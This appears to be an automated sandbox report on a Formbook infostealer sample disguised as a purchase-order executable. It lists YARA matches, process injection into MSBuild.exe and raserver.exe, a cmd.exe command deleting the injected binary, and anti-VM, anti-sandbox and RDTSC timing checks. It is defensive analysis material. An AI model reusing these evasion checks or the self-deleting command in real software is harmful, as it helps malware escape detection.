          Source: 00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmpBinary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
          Source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmpBinary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
          Source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmpBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
          Source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmpBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD
          Source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmpBinary or memory string: *.sln
          Source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmpBinary or memory string: MSBuild MyApp.csproj /t:Clean
          Source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmpBinary or memory string: /ignoreprojectextensions:.sln
          Source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmpBinary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@16/11
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase Order 40,7045$.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6268:120:WilError_01
          Source: Purchase Order 40,7045$.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Purchase Order 40,7045$.exe, 00000000.00000000.253166993.0000000000812000.00000002.00020000.sdmpBinary or memory string: UPDATE [sms].[dbo].[person]set email=@email, street=@street, city=@city, district=@district, zip=@zip WHERE id=;Student Information updated!!
          Source: Purchase Order 40,7045$.exeReversingLabs: Detection: 18%
          Source: unknownProcess created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}
          Source: unknownProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Purchase Order 40,7045$.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Purchase Order 40,7045$.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: Purchase Order 40,7045$.exeStatic file information: File size 1269760 > 1048576
          Source: Purchase Order 40,7045$.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x135800
          Source: Purchase Order 40,7045$.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 00000001.00000002.289628195.00000000014C0000.00000040.00000001.sdmp, raserver.exe, 00000006.00000002.522839886.00000000047B0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: MSBuild.exe, raserver.exe
          Source: Binary string: RAServer.pdb source: MSBuild.exe, 00000001.00000002.289540169.0000000001229000.00000004.00000020.sdmp
          Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmp
          Source: Binary string: RAServer.pdbGCTL source: MSBuild.exe, 00000001.00000002.289540169.0000000001229000.00000004.00000020.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: Purchase Order 40,7045$.exe, a?opP?s???y/WD??v?aA?O.cs.Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.Purchase Order 40,7045$.exe.810000.0.unpack, a?opP?s???y/WD??v?aA?O.cs.Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_0130DF50 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00415913 push edx; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041AC62 push D8D19732h; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00414D57 push esi; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041AD65 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00414DEA push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041ADB2 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041ADBB push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00414E7E push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041AE1C push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00414E24 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040FF92 push 00000033h; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0153D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0482D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_00675913 push edx; retf
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0067AC62 push D8D19732h; iretd
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0067AD65 push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_00674D57 push esi; retf
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_00674DEA push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0067ADB2 push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0067ADBB push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_00674E7E push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_00674E24 push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0067AE1C push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0066FF92 push 00000033h; iretd
          Source: initial sampleStatic PE information: section name: .text entropy: 7.30520133301
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: 00000000.00000002.260021885.0000000002D8D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Purchase Order 40,7045$.exe PID: 6708, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: Purchase Order 40,7045$.exe, 00000000.00000002.259984630.0000000002D51000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: Purchase Order 40,7045$.exe, 00000000.00000002.259984630.0000000002D51000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRDTSC instruction interceptor: First address: 00000000004083D4 second address: 00000000004083DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRDTSC instruction interceptor: First address: 000000000040876E second address: 0000000000408774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 00000000006683D4 second address: 00000000006683DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 000000000066876E second address: 0000000000668774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004086A0 rdtsc
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe TID: 6740Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe TID: 6712Thread sleep time: -41500s >= -30000s
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe TID: 6728Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6596Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\SysWOW64\raserver.exe TID: 6136Thread sleep time: -52000s >= -30000s
          Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: Purchase Order 40,7045$.exe, 00000000.00000002.260399670.000000000309F000.00000004.00000001.sdmpBinary or memory string: VMware
          Source: explorer.exe, 00000003.00000000.274132486.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000000.274511209.000000000891C000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Purchase Order 40,7045$.exe, 00000000.00000002.259984630.0000000002D51000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: Purchase Order 40,7045$.exe, 00000000.00000002.259984630.0000000002D51000.00000004.00000001.sdmpBinary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000003.00000000.265134044.0000000003767000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: Purchase Order 40,7045$.exe, 00000000.00000002.259984630.0000000002D51000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 00000003.00000002.522311765.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: Purchase Order 40,7045$.exe, 00000000.00000002.260399670.000000000309F000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000003.00000000.274567797.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000003.00000002.531888786.00000000053D7000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000003.00000000.274132486.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.274132486.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.274567797.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: Purchase Order 40,7045$.exe, 00000000.00000002.259984630.0000000002D51000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: Purchase Order 40,7045$.exe, 00000000.00000002.260399670.000000000309F000.00000004.00000001.sdmpBinary or memory string: VMware
          Source: Purchase Order 40,7045$.exe, 00000000.00000002.260399670.000000000309F000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: Purchase Order 40,7045$.exe, 00000000.00000002.260399670.000000000309F000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: Purchase Order 40,7045$.exe, 00000000.00000002.259984630.0000000002D51000.00000004.00000001.sdmpBinary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000003.00000000.274132486.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information queried: ProcessInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\raserver.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004086A0 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00409900 LdrLoadDll,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014EC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014EB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014EB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01504120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01504120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01504120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01504120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01504120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014EB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014EB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014EB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015741E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01512990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015099BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015099BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015099BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015099BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015669A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01500050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01500050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A2073 mov eax, dword ptr fs:[00000030h]
